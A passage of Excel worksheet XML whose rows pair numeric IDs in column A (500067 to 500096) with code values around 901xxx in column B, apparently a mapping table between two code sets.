    <row r="424" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A424" s="5">
        <v>500067</v>
      </c>
      <c r="B424" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="425" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A425" s="5">
        <v>500067</v>
      </c>
      <c r="B425" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="426" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A426" s="5">
        <v>500067</v>
      </c>
      <c r="B426" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="427" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A427" s="5">
        <v>500067</v>
      </c>
      <c r="B427" s="3">
        <v>901036.00100000005</v>
      </c>
    </row>
    <row r="428" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A428" s="5">
        <v>500067</v>
      </c>
      <c r="B428" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="429" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A429" s="5">
        <v>500067</v>
      </c>
      <c r="B429" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="430" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A430" s="5">
        <v>500067</v>
      </c>
      <c r="B430" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="431" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A431" s="5">
        <v>500067</v>
      </c>
      <c r="B431" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="432" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A432" s="5">
        <v>500067</v>
      </c>
      <c r="B432" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="433" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A433" s="5">
        <v>500067</v>
      </c>
      <c r="B433" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="434" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A434" s="5">
        <v>500067</v>
      </c>
      <c r="B434" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="435" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A435" s="5">
        <v>500067</v>
      </c>
      <c r="B435" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="436" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A436" s="5">
        <v>500067</v>
      </c>
      <c r="B436" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="437" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A437" s="5">
        <v>500067</v>
      </c>
      <c r="B437" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="438" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A438" s="5">
        <v>500067</v>
      </c>
      <c r="B438" s="3">
        <v>901529</v>
      </c>
    </row>
    <row r="439" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A439" s="5">
        <v>500067</v>
      </c>
      <c r="B439" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="440" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A440" s="5">
        <v>500067</v>
      </c>
      <c r="B440" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="441" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A441" s="5">
        <v>500082</v>
      </c>
      <c r="B441" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="442" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A442" s="5">
        <v>500082</v>
      </c>
      <c r="B442" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="443" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A443" s="5">
        <v>500082</v>
      </c>
      <c r="B443" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="444" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A444" s="5">
        <v>500082</v>
      </c>
      <c r="B444" s="3">
        <v>901115</v>
      </c>
    </row>
    <row r="445" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A445" s="5">
        <v>500082</v>
      </c>
      <c r="B445" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="446" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A446" s="5">
        <v>500082</v>
      </c>
      <c r="B446" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="447" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A447" s="5">
        <v>500082</v>
      </c>
      <c r="B447" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="448" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A448" s="5">
        <v>500082</v>
      </c>
      <c r="B448" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="449" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A449" s="5">
        <v>500082</v>
      </c>
      <c r="B449" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="450" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A450" s="5">
        <v>500082</v>
      </c>
      <c r="B450" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="451" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A451" s="5">
        <v>500082</v>
      </c>
      <c r="B451" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="452" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A452" s="5">
        <v>500082</v>
      </c>
      <c r="B452" s="3">
        <v>901565.00100000005</v>
      </c>
    </row>
    <row r="453" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A453" s="5">
        <v>500082</v>
      </c>
      <c r="B453" s="3">
        <v>901565.00199999998</v>
      </c>
    </row>
    <row r="454" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A454" s="5">
        <v>500082</v>
      </c>
      <c r="B454" s="3">
        <v>901565.00300000003</v>
      </c>
    </row>
    <row r="455" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A455" s="5">
        <v>500082</v>
      </c>
      <c r="B455" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="456" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A456" s="5">
        <v>500082</v>
      </c>
      <c r="B456" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="457" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A457" s="5">
        <v>500082</v>
      </c>
      <c r="B457" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="458" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A458" s="5">
        <v>500082</v>
      </c>
      <c r="B458" s="3">
        <v>901562.00300000003</v>
      </c>
    </row>
    <row r="459" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A459" s="5">
        <v>500082</v>
      </c>
      <c r="B459" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="460" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A460" s="5">
        <v>500082</v>
      </c>
      <c r="B460" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="461" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A461" s="5">
        <v>500082</v>
      </c>
      <c r="B461" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="462" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A462" s="5">
        <v>500082</v>
      </c>
      <c r="B462" s="3">
        <v>901070.00600000005</v>
      </c>
    </row>
    <row r="463" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A463" s="5">
        <v>500082</v>
      </c>
      <c r="B463" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="464" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A464" s="5">
        <v>500082</v>
      </c>
      <c r="B464" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="465" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A465" s="5">
        <v>500082</v>
      </c>
      <c r="B465" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="466" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A466" s="5">
        <v>500082</v>
      </c>
      <c r="B466" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="467" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A467" s="5">
        <v>500082</v>
      </c>
      <c r="B467" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="468" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A468" s="5">
        <v>500082</v>
      </c>
      <c r="B468" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="469" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A469" s="5">
        <v>500082</v>
      </c>
      <c r="B469" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="470" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A470" s="5">
        <v>500082</v>
      </c>
      <c r="B470" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="471" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A471" s="5">
        <v>500082</v>
      </c>
      <c r="B471" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="472" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A472" s="5">
        <v>500082</v>
      </c>
      <c r="B472" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="473" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A473" s="5">
        <v>500082</v>
      </c>
      <c r="B473" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="474" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A474" s="5">
        <v>500082</v>
      </c>
      <c r="B474" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="475" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A475" s="5">
        <v>500082</v>
      </c>
      <c r="B475" s="3">
        <v>901218.01100000006</v>
      </c>
    </row>
    <row r="476" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A476" s="5">
        <v>500082</v>
      </c>
      <c r="B476" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="477" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A477" s="5">
        <v>500082</v>
      </c>
      <c r="B477" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="478" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A478" s="5">
        <v>500082</v>
      </c>
      <c r="B478" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="479" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A479" s="5">
        <v>500082</v>
      </c>
      <c r="B479" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="480" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A480" s="5">
        <v>500082</v>
      </c>
      <c r="B480" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="481" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A481" s="5">
        <v>500082</v>
      </c>
      <c r="B481" s="3">
        <v>901529</v>
      </c>
    </row>
    <row r="482" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A482" s="5">
        <v>500082</v>
      </c>
      <c r="B482" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="483" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A483" s="5">
        <v>500087</v>
      </c>
      <c r="B483" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="484" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A484" s="5">
        <v>500087</v>
      </c>
      <c r="B484" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="485" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A485" s="5">
        <v>500087</v>
      </c>
      <c r="B485" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="486" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A486" s="5">
        <v>500087</v>
      </c>
      <c r="B486" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="487" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A487" s="5">
        <v>500087</v>
      </c>
      <c r="B487" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="488" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A488" s="5">
        <v>500087</v>
      </c>
      <c r="B488" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="489" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A489" s="5">
        <v>500087</v>
      </c>
      <c r="B489" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="490" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A490" s="5">
        <v>500087</v>
      </c>
      <c r="B490" s="3">
        <v>901115</v>
      </c>
    </row>
    <row r="491" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A491" s="5">
        <v>500087</v>
      </c>
      <c r="B491" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="492" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A492" s="5">
        <v>500087</v>
      </c>
      <c r="B492" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="493" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A493" s="5">
        <v>500087</v>
      </c>
      <c r="B493" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="494" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A494" s="5">
        <v>500087</v>
      </c>
      <c r="B494" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="495" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A495" s="5">
        <v>500087</v>
      </c>
      <c r="B495" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="496" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A496" s="5">
        <v>500087</v>
      </c>
      <c r="B496" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="497" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A497" s="5">
        <v>500087</v>
      </c>
      <c r="B497" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="498" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A498" s="5">
        <v>500087</v>
      </c>
      <c r="B498" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="499" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A499" s="5">
        <v>500087</v>
      </c>
      <c r="B499" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="500" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A500" s="5">
        <v>500087</v>
      </c>
      <c r="B500" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="501" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A501" s="5">
        <v>500087</v>
      </c>
      <c r="B501" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="502" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A502" s="5">
        <v>500087</v>
      </c>
      <c r="B502" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="503" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A503" s="5">
        <v>500087</v>
      </c>
      <c r="B503" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="504" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A504" s="5">
        <v>500087</v>
      </c>
      <c r="B504" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="505" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A505" s="5">
        <v>500087</v>
      </c>
      <c r="B505" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="506" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A506" s="5">
        <v>500087</v>
      </c>
      <c r="B506" s="3">
        <v>901056</v>
      </c>
    </row>
    <row r="507" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A507" s="5">
        <v>500087</v>
      </c>
      <c r="B507" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="508" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A508" s="5">
        <v>500087</v>
      </c>
      <c r="B508" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="509" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A509" s="5">
        <v>500087</v>
      </c>
      <c r="B509" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="510" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A510" s="5">
        <v>500087</v>
      </c>
      <c r="B510" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="511" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A511" s="5">
        <v>500087</v>
      </c>
      <c r="B511" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="512" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A512" s="5">
        <v>500087</v>
      </c>
      <c r="B512" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="513" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A513" s="5">
        <v>500087</v>
      </c>
      <c r="B513" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="514" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A514" s="5">
        <v>500087</v>
      </c>
      <c r="B514" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="515" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A515" s="5">
        <v>500087</v>
      </c>
      <c r="B515" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="516" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A516" s="5">
        <v>500087</v>
      </c>
      <c r="B516" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="517" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A517" s="5">
        <v>500087</v>
      </c>
      <c r="B517" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="518" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A518" s="5">
        <v>500087</v>
      </c>
      <c r="B518" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="519" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A519" s="5">
        <v>500087</v>
      </c>
      <c r="B519" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="520" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A520" s="5">
        <v>500087</v>
      </c>
      <c r="B520" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="521" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A521" s="5">
        <v>500087</v>
      </c>
      <c r="B521" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="522" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A522" s="5">
        <v>500087</v>
      </c>
      <c r="B522" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="523" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A523" s="5">
        <v>500087</v>
      </c>
      <c r="B523" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="524" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A524" s="5">
        <v>500087</v>
      </c>
      <c r="B524" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="525" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A525" s="5">
        <v>500087</v>
      </c>
      <c r="B525" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="526" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A526" s="5">
        <v>500087</v>
      </c>
      <c r="B526" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="527" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A527" s="5">
        <v>500087</v>
      </c>
      <c r="B527" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="528" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A528" s="5">
        <v>500087</v>
      </c>
      <c r="B528" s="3">
        <v>901553.00600000005</v>
      </c>
    </row>
    <row r="529" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A529" s="5">
        <v>500087</v>
      </c>
      <c r="B529" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="530" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A530" s="5">
        <v>500087</v>
      </c>
      <c r="B530" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="531" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A531" s="5">
        <v>500087</v>
      </c>
      <c r="B531" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="532" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A532" s="5">
        <v>500087</v>
      </c>
      <c r="B532" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="533" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A533" s="5">
        <v>500087</v>
      </c>
      <c r="B533" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="534" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A534" s="5">
        <v>500087</v>
      </c>
      <c r="B534" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="535" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A535" s="5">
        <v>500096</v>
      </c>
      <c r="B535" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="536" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A536" s="5">
        <v>500096</v>
      </c>
      <c r="B536" s="3">
        <v>901071.00199999998</v>
      </c>
    </row>
    <row r="537" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A537" s="5">
        <v>500096</v>
      </c>
      <c r="B537" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="538" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A538" s="5">
        <v>500096</v>
      </c>
      <c r="B538" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="539" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A539" s="5">
        <v>500096</v>
      </c>
      <c r="B539" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="540" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A540" s="5">
        <v>500096</v>
      </c>
      <c r="B540" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="541" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A541" s="5">
        <v>500096</v>
      </c>
      <c r="B541" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="542" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A542" s="5">
        <v>500096</v>
      </c>
      <c r="B542" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="543" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A543" s="5">
        <v>500096</v>
      </c>
      <c r="B543" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="544" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A544" s="5">
        <v>500096</v>
      </c>
      <c r="B544" s="3">
        <v>901059.00399999996</v>
      </c>
    </row>
    <row r="545" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A545" s="5">
        <v>500096</v>
      </c>
      <c r="B545" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="546" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A546" s="5">
        <v>500096</v>
      </c>
      <c r="B546" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="547" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A547" s="5">
        <v>500096</v>
      </c>
      <c r="B547" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="548" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A548" s="5">
        <v>500096</v>
      </c>
      <c r="B548" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="549" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A549" s="5">
        <v>500096</v>
      </c>
      <c r="B549" s="3">
        <v>901568.00199999998</v>
      </c>
    </row>
    <row r="550" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A550" s="5">
        <v>500096</v>
      </c>
      <c r="B550" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="551" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A551" s="5">
        <v>500096</v>
      </c>
      <c r="B551" s="3">
        <v>901480.00100000005</v>
      </c>
    </row>
    <row r="552" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A552" s="5">
        <v>500096</v>
      </c>
      <c r="B552" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="553" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A553" s="5">
        <v>500096</v>
      </c>
      <c r="B553" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="554" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A554" s="5">
        <v>500096</v>
      </c>
      <c r="B554" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="555" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A555" s="5">
        <v>500096</v>
      </c>
      <c r="B555" s="3">
        <v>901008</v>
      </c>
    </row>
    <row r="556" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A556" s="5">
        <v>500096</v>
      </c>
      <c r="B556" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="557" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A557" s="5">
        <v>500096</v>
      </c>
      <c r="B557" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="558" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A558" s="5">
        <v>500096</v>
      </c>
      <c r="B558" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="559" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A559" s="5">
        <v>500096</v>
      </c>
      <c r="B559" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="560" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A560" s="5">
        <v>500096</v>
      </c>
      <c r="B560" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="561" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A561" s="5">
        <v>500096</v>
      </c>
      <c r="B561" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="562" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A562" s="5">
        <v>500096</v>
      </c>
      <c r="B562" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="563" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A563" s="5">
        <v>500096</v>
      </c>
      <c r="B563" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="564" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A564" s="5">
        <v>500096</v>
      </c>
      <c r="B564" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="565" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A565" s="5">
        <v>500096</v>
      </c>
      <c r="B565" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="566" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A566" s="5">
        <v>500096</v>
      </c>
      <c r="B566" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="567" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A567" s="5">
        <v>500096</v>
      </c>
      <c r="B567" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="568" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A568" s="5">
        <v>500096</v>
      </c>
      <c r="B568" s="3">
        <v>901104</v>
      </c>
    </row>
    <row r="569" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A569" s="5">
        <v>500096</v>
      </c>
      <c r="B569" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="570" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A570" s="5">
        <v>500096</v>
      </c>
      <c r="B570" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="571" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A571" s="5">
        <v>500096</v>
      </c>
      <c r="B571" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="572" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A572" s="5">
        <v>500096</v>
      </c>
      <c r="B572" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="573" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A573" s="5">
        <v>500096</v>
      </c>
      <c r="B573" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="574" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A574" s="5">
        <v>500096</v>
      </c>
      <c r="B574" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="575" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A575" s="5">
        <v>500096</v>
      </c>
      <c r="B575" s="3">
        <v>901542.00300000003</v>
      </c>
    </row>
    <row r="576" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A576" s="5">
        <v>500096</v>
      </c>
      <c r="B576" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="577" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A577" s="5">
        <v>500096</v>
      </c>
      <c r="B577" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="578" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A578" s="5">
        <v>500096</v>
      </c>
      <c r="B578" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="579" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A579" s="5">
        <v>500096</v>
      </c>
      <c r="B579" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="580" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A580" s="5">
        <v>500096</v>
      </c>
      <c r="B580" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="581" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A581" s="5">
        <v>500096</v>
      </c>
      <c r="B581" s="3">
        <v>901014</v>
      </c>
    </row>
    <row r="582" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A582" s="5">
        <v>500096</v>
      </c>
      <c r="B582" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="583" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A583" s="5">
        <v>500096</v>
      </c>
      <c r="B583" s="3">
        <v>901218.00100000005</v>
      </c>
